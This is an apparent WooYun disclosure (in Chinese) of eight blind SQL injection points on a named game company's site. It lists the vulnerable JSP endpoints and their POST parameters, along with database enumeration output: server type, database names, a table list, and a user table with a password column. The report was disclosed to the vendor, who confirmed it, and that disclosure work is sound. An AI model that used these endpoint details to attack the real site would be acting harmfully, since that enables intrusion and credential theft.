当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0132694

漏洞标题:49you某站多处SQL注入打包

相关厂商:49you.com

漏洞作者: 路人甲

提交时间:2015-08-08 23:08

修复时间:2015-09-27 09:12

公开时间:2015-09-27 09:12

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-08: 细节已通知厂商并且等待厂商处理中
2015-08-13: 厂商已经确认,细节仅向厂商公开
2015-08-23: 细节向核心白帽子及相关领域专家公开
2015-09-02: 细节向普通白帽子公开
2015-09-12: 细节向实习白帽子公开
2015-09-27: 细节向公众公开

简要描述:

多处注入打包,多参数。
求20RANK

详细说明:

SQL盲注,八处,每一处都有多个参数
第一处,多参数

http://dj.49you.com/web/CPGameManage.jsp
POST参数:
beginTime=-1&cpName=mnxcfwuf&endTime=2015-08-08&gameNamestr=mnxcfwuf
参数beginTime, cpName, endTime, gameNamestr都存在注入


第二处:

http://dj.49you.com/web/cpincome.jsp
POST参数:
beginTime=-1&cbName=pshrldjs&endTime=1&spName=pshrldjs
参数beginTime, cdName, endTime, spName都存在注入


第三处:

http://dj.49you.com/web/cpProvinceList.jsp
POST参数:
beginTime=2015-08-08&cbName=-1&cityName=xdtmdadm&endTime=2015-08-08
参数cbName,cityName都存在注入


第四处:

http://dj.49you.com/web/sy_sjwar_cpincome.jsp
POST参数:
beginTime=-1&endTime=1&spName=htkwbbeq
参数beginTime,endTime,spName都存在注入


第五处:

http://dj.49you.com/web/tab/LyGameIncome.jsp
POST参数:appname=-1&beginTime=2015-08-08&channelName=A0001&endTime=2015-08-08&spname=%e5%8c%97%e4%ba%ac%e5%88%9b%e6%84%8f%e6%af%94%e7%89%b9%e4%bf%a1%e6%81%af%e6%8a%80%e6%9c%af%e6%9c%89%e9%99%90%e5%85%ac%e5%8f%b8
参数appname,beginTime,channelName,spname都存在注入


第六处

http://dj.49you.com/web/tab/WoGameIncome.jsp
POST参数:
appname=-1&beginTime=2015-08-01&channelName=%e5%9b%9b%e4%b9%9d%e6%b8%b8(0028969)&endTime=2015-08-08&spname=%e5%b9%bf%e5%b7%9e%e5%9b%9b%e4%b9%9d%e6%b8%b8&type=%e7%a7%bb%e5%8a%a8MM
参数appname,beginTime,channelName,enTime,spname,type参数都存在注入


第七处:

http://dj.49you.com/web/tab/WoGameIncome0807.jsp
POST参数:
appname=xhofrmpv&beginTime=-1&channelName=%e5%9b%9b%e4%b9%9d%e6%b8%b8(0027913)&endTime=2015-08-08&spname=%e6%99%8b%e6%98%b6&type=%e7%a7%bb%e5%8a%a8MM
参数beginTime,enTime,spname,type参数都存在注入


第八处:

http://dj.49you.com/web/tab/WoGameIncome2.jsp
POST参数:
beginTime=2015-08-01&endTime=2015-08-08&spname=%e5%b9%bf%e5%b7%9e%e5%9b%9b%e4%b9%9d%e6%b8%b8
beginTime,endTime,spname参数都存在注入


漏洞证明:

web application technology: Nginx
back-end DBMS: Microsoft SQL Server 2012
current user:    'sp'
current database:    'SP'
current user is DBA:    False
available databases [17]:
[*] Administration
[*] blacklist
[*] Company
[*] DataBack
[*] master
[*] model
[*] msdb
[*] new_system
[*] NZIformation
[*] ReportServer
[*] ReportServerTempDB
[*] shouYou
[*] SP
[*] SP2
[*] tempdb
[*] Test
[*] wap_game
web application technology: Nginx, JSP
back-end DBMS: Microsoft SQL Server 2012
Database: SP
[108 tables]
+---------------------+
| CityList            |
| Ctstats             |
| DHXGame_User        |
| DXBaoYueZDYJH       |
| OnlineProvince      |
| PcInterface         |
| ProvinceCity        |
| ProvinceList        |
| amountTable         |
| baoyue              |
| baoyue2             |
| black_imsi          |
| by_send             |
| cp_channel          |
| cpbaccount          |
| cppay               |
| cppay_date          |
| cppay_pro           |
| dx_imsinum_mrtj     |
| dx_phonenum_motj    |
| dx_phonenum_mrtj    |
| dxbaoyuesendrecord  |
| dxopencity          |
| dxspid              |
| fee_request         |
| fee_request1        |
| fp                  |
| fptaxrate           |
| game                |
| gameIncome          |
| gametype            |
| gamezhou            |
| hourinfo            |
| imei                |
| importtxt           |
| imsi                |
| imsi0716            |
| interfaceAgency     |
| kftsManage          |
| ltgamerecv          |
| ltsjyx              |
| ltwogame            |
| mmLoginInfor        |
| mmOrder             |
| mmShow              |
| mm_list             |
| mm_rule             |
| mmcompany           |
| mmctrl              |
| mmqrecv             |
| mmrecv              |
| monthinformation    |
| mosync              |
| mrsync              |
| newCityList         |
| nz_cp               |
| pb_cp               |
| pcgame              |
| pcgameid            |
| pcweb               |
| pinbi_cp            |
| price               |
| pro_tj              |
| recv_mo             |
| recvrecord          |
| rules               |
| send_mr             |
| sendrecord          |
| servicetype         |
| settlement          |
| settlement_back     |
| settlement_pro      |
| sjqbrecv            |
| smsrecv             |
| sq_phonenum_tj      |
| tb_Day_Stat         |
| tb_LINE             |
| tb_LyDay_Stat       |
| tb_LyDay_Stat0707   |
| tb_LyDay_Stat_0702  |
| tb_SP               |
| tb_byDDmo           |
| tb_byDDmr           |
| tb_informMM         |
| tb_monthcalculate   |
| tb_spinformation    |
| tb_sppay            |
| tb_wyurlmanage      |
| telimsi             |
| telrecv             |
| telrecvs            |
| temp_send           |
| temp_send1          |
| temp_send2          |
| testsendrecord      |
| text                |
| textlink            |
| tj                  |
| tjOrd2              |
| tjbakbak            |
| update_rules_record |
| vbtj                |
| vw_rules            |
| wjwar               |
| wx_Login_Type       |
| wx_User             |
| xiaoguobiao         |
| zxf_cp              |
+---------------------+
web application technology: Nginx, JSP
back-end DBMS: Microsoft SQL Server 2012
Database: SP
Table: wx_User
[6 columns]
+--------------+----------+
| Column       | Type     |
+--------------+----------+
| COMPANY_NAME | varchar  |
| ID           | int      |
| INSERT_TIME  | datetime |
| LOGIN_NAME   | varchar  |
| LOGIN_PASS   | varchar  |
| TYPE_ID      | int      |
+--------------+----------+

修复方案:

参数过滤,还有很多XSS,建议系统检查下这个站点。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-08-13 09:10

厂商回复:

谢谢路人甲,我们这边安排技术处理中

最新状态:

暂无

漏洞评价:

评论